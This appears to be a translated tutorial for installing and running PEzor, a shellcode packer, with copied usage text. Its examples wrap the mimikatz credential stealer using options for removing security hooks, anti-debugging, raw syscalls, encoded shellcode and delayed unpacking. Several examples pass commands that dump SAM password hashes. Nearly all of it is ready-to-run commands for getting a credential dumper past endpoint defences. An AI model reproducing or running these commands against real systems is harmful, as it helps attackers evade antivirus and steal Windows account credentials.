To use PEzor, it is recommended to download the latest version of Kali.
Installation:
$ git clone https://github.com/phra/PEzor.git
$ cd PEzor
$ sudo bash install.sh
$ bash PEzor.sh -h
Note that sudo bash install.sh may fail while downloading; if that happens, run apt-get update first and retry.
$ bash PEzor.sh -h
If it reports that the PATH environment variable is not configured, set up the environment first.
Two tools need to be on PATH: sgn and wclang.
Environment configuration:
export PATH=$PATH:~/go/bin/:/home/lpy/PEzor:/home/lpy/PEzor/deps/donut_v0.9.3/:/home/lpy/wclang/prefix/bin/:/home/lpy/PEzor/sgn/
Note that the lpy path is my own; adjust it to match your own directories.
sgn installation
Installation:
go get github.com/EgeBalci/sgn
Download https://github.com/EgeBalci/sgn and extract it into the PEzor directory.
wclang installation
Installation:
git clone https://github.com/tpoechtrager/wclang
cd wclang
cmake -DCMAKE_INSTALL_PREFIX=prefix .
make
make install
Remember to set the environment variables to your own directories.
If you run into permission problems, use: sudo su
and enter your password.
Generating:
cd PEzor
PEzor.sh -32 1.exe
Documentation:
USAGE
$ PEzor [options…] [donut args…]
OPTIONS
-h Show usage and exits
-32 Force 32-bit executable
-64 Force 64-bit executable
-debug Generate a debug build
-unhook User-land hooks removal
-antidebug Add anti-debug checks
-syscalls Use raw syscalls [64-bit only] [Windows 10 only]
-sgn Encode the generated shellcode with sgn
-text Store shellcode in .text section instead of .data
-rx Allocate RX memory for shellcode
-self Execute the shellcode in the same thread
-sdk=VERSION Use specified .NET Framework version (2, 4, 4.5 (default))
-sleep=N Sleeps for N seconds before unpacking the shellcode
-format=FORMAT Outputs result in specified FORMAT (exe, dll, reflective-dll, service-exe, service-dll, dotnet, dotnet-createsection, dotnet-pinvoke)
[donut args…] After the executable to pack, you can pass additional Donut args, such as -z 2
EXAMPLES
64-bit (self-inject RWX)
$ PEzor.sh -unhook -antidebug -text -self -sleep=120 mimikatz/x64/mimikatz.exe -z 2
64-bit (self-inject RX)
$ PEzor.sh -unhook -antidebug -text -self -rx -sleep=120 mimikatz/x64/mimikatz.exe -z 2
64-bit (raw syscalls)
$ PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 mimikatz/x64/mimikatz.exe -z 2
64-bit (reflective dll)
$ PEzor.sh -format=reflective-dll mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'
64-bit (service exe)
$ PEzor.sh -format=service-exe mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'
64-bit (service dll)
$ PEzor.sh -format=service-dll mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'
64-bit (dotnet)
$ PEzor.sh -format=dotnet -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'
64-bit (dotnet-pinvoke)
$ PEzor.sh -format=dotnet-pinvoke -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'
64-bit (dotnet-createsection)
$ PEzor.sh -format=dotnet-createsection -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '"log c:\users\public\mimi.out" "token::whoami" "exit"'
32-bit (self-inject)
$ PEzor.sh -unhook -antidebug -text -self -sleep=120 mimikatz/Win32/mimikatz.exe -z 2
32-bit (Win32 API: VirtualAlloc/WriteProcessMemory/CreateRemoteThread)
$ PEzor.sh -sgn -unhook -antidebug -text -sleep=120 mimikatz/Win32/mimikatz.exe -z 2
32-bit (Win32 API: VirtualAlloc/WriteProcessMemory/CreateRemoteThread) with arguments for donut
$ PEzor.sh -sgn -unhook -antidebug -text -sleep=120 mimikatz/Win32/mimikatz.exe -z 2 "-plsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv"
For other usage modes, refer to the official project page.